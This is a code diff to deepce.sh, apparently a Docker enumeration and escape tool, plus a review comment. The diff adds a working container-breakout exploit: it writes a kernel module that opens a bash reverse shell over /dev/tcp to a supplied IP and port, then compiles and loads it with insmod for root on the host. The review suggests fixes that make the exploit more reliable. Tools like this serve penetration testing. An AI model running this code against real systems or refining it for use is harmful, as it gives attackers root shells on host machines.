Project Update
112
deepce.sh
112
deepce.sh
@@ -67,6 +67,7 @@ Usage: ${0##*/} [OPTIONS...]
|
||||
SOCK use an exposed docker sock to create a new container and mount root partition to priv esc
|
||||
CVE-2019-5746
|
||||
CVE-2019-5021
|
||||
SYS_MODULE Exploit the SYS_MODULE privilege to create a malicious kernel module and obtain root on the host
|
||||
|
||||
${DG}[Payloads & Options]$NC
|
||||
-i, --ip The local host IP address for reverse shells to connect to
|
||||
@@ -125,6 +126,8 @@ TIP_CVE_2019_5021="Alpine linux version 3.3.x-3.5.x accidentally allow users to
|
||||
TIP_CVE_2019_13139="Docker versions before 18.09.4 are vulnerable to a command execution vulnerability when parsing URLs"
|
||||
TIP_CVE_2019_5736="Docker versions before 18.09.2 are vulnerable to a container escape by overwriting the runC binary"
|
||||
|
||||
TIP_SYS_MODULE="Giving the container the SYS_MODULE privilege allows for kernel modules to be mounted. Using this, a malicious module can be used to execute code as root on the host."
|
||||
|
||||
DANGEROUS_GROUPS="docker\|lxd\|root\|sudo\|wheel"
|
||||
DANGEROUS_CAPABILITIES="cap_sys_admin\|cap_sys_ptrace\|cap_sys_module\|dac_read_search\|dac_override"
|
||||
|
||||
@@ -1112,6 +1115,112 @@ exploitDockerSock() {
|
||||
# TODO: Tidy up command
|
||||
}
|
||||
|
||||
exploitSysModule(){
|
||||
printSection "Exploiting SYS_MODULE"
|
||||
printTip "$TIP_SYS_MODULE"
|
||||
|
||||
if ! [ -x "$(command -v capsh)" ]; then
|
||||
printError "capsh is required to run this exploit."
|
||||
exit 1
|
||||
fi
|
||||
|
||||
if ! [ -x "$(command -v make)" ]; then
|
||||
printError "make is required to run this exploit."
|
||||
exit 1
|
||||
fi
|
||||
|
||||
if ! [ -x "$(command -v insmod)" ]; then
|
||||
printError "insmod is required to run this exploit."
|
||||
exit 1
|
||||
fi
|
||||
|
||||
if ! [ -d "/lib/modules/$(uname -r)" ]; then
|
||||
printError "Linux headers for $(uname -r) are required to run this exploit."
|
||||
exit 1
|
||||
fi
|
||||
|
||||
caps=$(capsh --print)
|
||||
if ! echo "$caps" | grep -qa "cap_sys_module" ; then
|
||||
printError "We don't have the SYS_MODULE capability, which is required for this exploit"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
if [ -z "$ip" ]; then
|
||||
printError "Missing reverse shell IP : use --ip"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
if [ -z "$port" ]; then
|
||||
printError "Missing reverse shell port : use --port"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
module_name=$(tr -dc A-Za-z </dev/urandom | head -c 13)
|
||||
sys_cwd=$(pwd)
|
||||
|
||||
mkdir /dev/shm/rev && cd /dev/shm/rev || exit 1
|
||||
|
||||
printQuestion "Writing scripts..."
|
||||
|
||||
# POC modified from https://blog.pentesteracademy.com/abusing-sys-module-capability-to-perform-docker-container-breakout-cf5c29956edd
|
||||
cat << EOF > "$module_name.c"
|
||||
#include <linux/kmod.h>
|
||||
#include <linux/module.h>
|
||||
MODULE_LICENSE("GPL");
|
||||
MODULE_AUTHOR("AttackDefense");
|
||||
MODULE_DESCRIPTION("LKM reverse shell module");
|
||||
MODULE_VERSION("1.0");
|
||||
char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/$ip/$port 0>&1", NULL};
|
||||
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };
|
||||
static int __init ${module_name}_init(void) {
|
||||
return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
|
||||
}
|
||||
static void __exit ${module_name}_exit(void) {
|
||||
}
|
||||
module_init(${module_name}_init);
|
||||
module_exit(${module_name}_exit);
|
||||
EOF
|
||||
|
||||
cat << EOF > Makefile
|
||||
obj-m +=${module_name}.o
|
||||
all:
|
||||
make -C /lib/modules/$(uname -r)/build M=$(pwd) modules
|
||||
clean:
|
||||
make -C /lib/modules/$(uname -r)/build M=$(pwd) clean
|
||||
EOF
|
||||
|
||||
printSuccess "Done"
|
||||
|
||||
printQuestion "Compiling kernel module..."
|
||||
|
||||
if make 1>/dev/null ; then
|
||||
printSuccess "Done"
|
||||
else
|
||||
printError "Failed to make. Do you have all the required libraries installed?"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
printQuestion "Mounting kernel module..."
|
||||
|
||||
if insmod "$module_name.ko" 1>/dev/null ; then
|
||||
printSuccess "Done"
|
||||
else
|
||||
printError "Failed to mount module"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
printQuestion "Cleaning up..."
|
||||
|
||||
rm -r /dev/shm/rev
|
||||
|
||||
cd "$sys_cwd" || exit
|
||||
|
||||
printSuccess "Done"
|
||||
|
||||
printSuccess "Check your reverse shell handler!"
|
||||
|
||||
}
|
||||
|
||||
###########################################
|
||||
#--------------) Arg Parse (--------------#
|
||||
###########################################
|
||||
@@ -1246,6 +1355,9 @@ if [ "$exploit" ]; then
|
||||
sock | SOCK)
|
||||
exploitDockerSock
|
||||
;;
|
||||
sys | SYS | sys_module | SYS_MODULE)
|
||||
exploitSysModule
|
||||
;;
|
||||
*)
|
||||
echo "Unknown exploit $1"
|
||||
exit 1
|
||||
|
||||
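Review bot: The headers check in exploitSysModule, `if ! [ -d "/lib/modules/$(uname -r)" ]; then`, only proves a modules directory exists, while the generated Makefile builds against `/lib/modules/$(uname -r)/build`, so a container that ships modules but no kernel headers passes the check and then dies at `make` with the vaguer "Do you have all the required libraries installed?" message; test the build path instead: `if ! [ -d "/lib/modules/$(uname -r)/build" ]; then`. The working directory is a fixed path, `mkdir /dev/shm/rev && cd /dev/shm/rev || exit 1`, and the function exits before `rm -r /dev/shm/rev` on any make or insmod failure, so a leftover directory from one aborted run blocks every later run and the predictable name is visible to anything else sharing /dev/shm; `workdir=$(mktemp -d /dev/shm/.XXXXXXXXXX) || exit 1` with `cd "$workdir"` and `rm -r "$workdir"` in the cleanup step avoids both. The module is never unloaded, so a module with a random 13-letter name stays resident on the host after the shell spawns; a comment on the `insmod` line such as `# module stays loaded on the host: rmmod it from the reverse shell once done` would make that expectation explicit. Finally, `grep -qa "cap_sys_module"` runs over the whole of `capsh --print`, which presumably lists the bounding set as well as the current set, so anchoring to the current-set line (`capsh --print | grep '^Current:' | grep -q cap_sys_module`) would avoid reporting the capability when only the bounding set carries it.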